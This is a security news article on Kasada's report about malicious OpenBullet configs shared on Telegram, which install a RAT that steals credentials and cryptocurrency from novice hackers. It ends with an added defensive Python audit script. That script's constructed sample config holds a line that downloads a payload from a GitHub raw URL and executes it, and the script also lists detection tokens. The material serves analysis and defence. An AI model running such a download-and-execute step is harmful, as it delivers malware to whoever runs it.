Attackers Targeting Inexperienced Hackers With New Malware Campaign

Even as they run malware attacks against targets that live outside of the cybercriminal ecosystem, it’s not unusual for more experienced hackers to turn their focus on their less-skilled brethren. A new campaign is putting that tendency into sharp focus.

In the campaign detected by researchers at bot management vendor Kasada, unknown bad actors are leveraging the OpenBullet software testing suite to install a remote access Trojan (RAT) onto the systems of so-called “script kiddies,” with the apparent goal of stealing their data and cryptocurrency.

Members of Kasada’s Threat Intelligence Team wrote in a report that the campaign caught their attention “due to the novel infection vector and the exploitation of the sense of trust the members of these criminal communities have for one another.”

“Sophisticated threat actors have a reputation for preying on beginner hackers, known as ‘script kiddies’ who rely on pre-existing scripts and tools,” the Kasada team wrote. “A typical scenario occurs when more knowledgeable threat actors bundle malicious code into their tools and share them within a community.”

The younger – and much less experienced – hackers will blindly run these tools and inadvertently infect their computers.

Leveraging OpenBullet

In this case, it was when script kiddies downloaded OpenBullet configurations from a Telegram channel that included a function designed to bypass Google’s reCAPTCHA anti-bot tool. OpenBullet is a legitimate offering that is found on GitHub and is used by organizations for such tasks as data scraping and parsing and automated penetration testing, according to bot management software vendor Netacea.

“Unfortunately, OpenBullet’s open-source nature and low barrier to entry have resulted in it being the tool of choice for malicious actors looking to automate credential stuffing and account takeover (ATO) attacks,” the Kasada researchers wrote.

OpenBullet uses configuration files to test the security of websites and web applications, but in the hands of attackers, they can be used to target these sites and applications while getting around CAPTCHAs and other security measures.

Configs show OpenBullet how to generate HTTP requests against targets, run browser commands, grab data from accounts that have been taken over and run sophisticated attacks. They can be complex, with some made up of hundreds of lines of code.

They also can be sold or traded to other cybercriminals on hacking forums to run their own credential stuffing attacks – where the bad actor gets access to a protected account using compromised credentials – or brute-force attacks. While OpenBullet configs can enable complex attacks, inexperienced hackers may not fully grasp what requests are being created or the data that is being taken.

“The creators of this particular malicious campaign are taking advantage of this, utilizing variables and randomly-ordered functions to confuse the victim and obfuscate the true nature of the config,” the researchers wrote.

Keep Hold of Your Cryptowallets

The malicious configs discovered by Kasada carry two payloads that are stored on a GitHub repository. The first, dubbed Ocean, is a dropper payload built using the Rust programming language and with the sole purpose of dropping the second payload, called Patent. It’s a Python-based malware that launches the RAT and communicates with the campaign operators over Telegram, using the encrypted messaging app as its command-and-control (C2) mechanism. Among its jobs is to take screenshots, list contents in the directory, kill tasks and identify and decrypt stored logins and cookies from several Chromium browsers.

It also searches for cryptowallets and steals cryptocurrencies such as Bitcoin, Ethereum and Dogecoin and operates as a clipper, allowing it to eventually run unauthorized fund transfers from the cryptowallets to other wallet addresses controlled by the hackers.

According to Kasada, as of earlier this month, the attackers seem to have stolen $1.703 worth of Bitcoin and $2,107 of the other coins.

“The distribution of the malicious OpenBullet configs within Telegram is a novel infection vector, likely targeting these criminal communities due to their frequent use of cryptocurrencies,” the researchers wrote. “Members within these communities regularly use cryptocurrency to buy tools, configs, and stolen credentials from each other.

“As the old saying goes, there is no honour amongst thieves,” the researchers said.

While the campaign is targeting other hackers, non-criminal organizations could be affected by the malware, and threat intelligence experts and security vendors could get bitten by it if they don’t first check for and remove malicious function calls within their OpenBullet configs, they wrote.
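As an added illustration (not code from the article or from Kasada), here is a small Python audit that does what the paragraph above recommends: it expands variable indirection in a config, lists every host the config would actually contact, and flags lines that write or execute files. The config text and its SET VAR / REQUEST line format are constructed for the demo and are not OpenBullet's real syntax; the allowlist of expected target hosts is likewise an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed sample in an illustrative "SET VAR / REQUEST" line format.
# NOT OpenBullet's real config syntax (an assumption for this demo); it only
# mimics the trick the report describes: the payload URL is split across
# variables so it never appears whole anywhere in the file.
SAMPLE_CONFIG = """\
SET VAR "TARGET" "https://login.example-shop.test/api/auth"
REQUEST POST "<TARGET>" CONTENT "user=<USER>&pass=<PASS>"
SET VAR "p2" "usercontent.com/someuser/somerepo/main/ocean.bin"
SET VAR "p1" "https://raw.github"
REQUEST GET "<p1><p2>" -> FILE "%TEMP%/ocean.bin"
SHELL "%TEMP%/ocean.bin"
"""

SET_VAR_RE = re.compile(r'^SET VAR "([^"]+)" "([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"<>]+')
# Tokens with no place in a config that should only talk to its target site.
SUSPICIOUS_TOKENS = ("SHELL", "EXEC", "-> FILE")

def naive_grep(text, needle):
    """What a quick text search does: look for the needle verbatim."""
    return needle in text

def parse_vars(text):
    """Collect SET VAR definitions into a name -> value map."""
    variables = {}
    for line in text.splitlines():
        m = SET_VAR_RE.match(line.strip())
        if m:
            variables[m.group(1)] = m.group(2)
    return variables

def expand(line, variables):
    """Substitute <name> placeholders until nothing changes (bounded)."""
    for _ in range(len(variables) + 1):
        new = line
        for name, value in variables.items():
            new = new.replace(f"<{name}>", value)
        if new == line:
            break
        line = new
    return line

def audit_config(text, allowed_hosts):
    """Report hosts outside the allowlist and risky tokens, after expansion."""
    variables = parse_vars(text)
    unexpected, suspicious = set(), []
    for raw in text.splitlines():
        if SET_VAR_RE.match(raw.strip()):
            continue  # definitions are examined where they are used
        line = expand(raw, variables)
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                unexpected.add(host)
        if any(tok in line.upper() for tok in SUSPICIOUS_TOKENS):
            suspicious.append(line)
    return {"unexpected_hosts": unexpected, "suspicious_lines": suspicious}
```

A plain search for "githubusercontent" in the sample returns False because the host is split across two variables, while audit_config reports raw.githubusercontent.com as an unexpected host and flags the two file-write and shell lines.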


Jeffrey Burt

Jeffrey Burt has been a journalist for more than three decades, writing about technology since 2000. He’s written for a variety of outlets, including eWEEK, The Next Platform, The Register, The New Stack, eSecurity Planet, and Channel Insider.
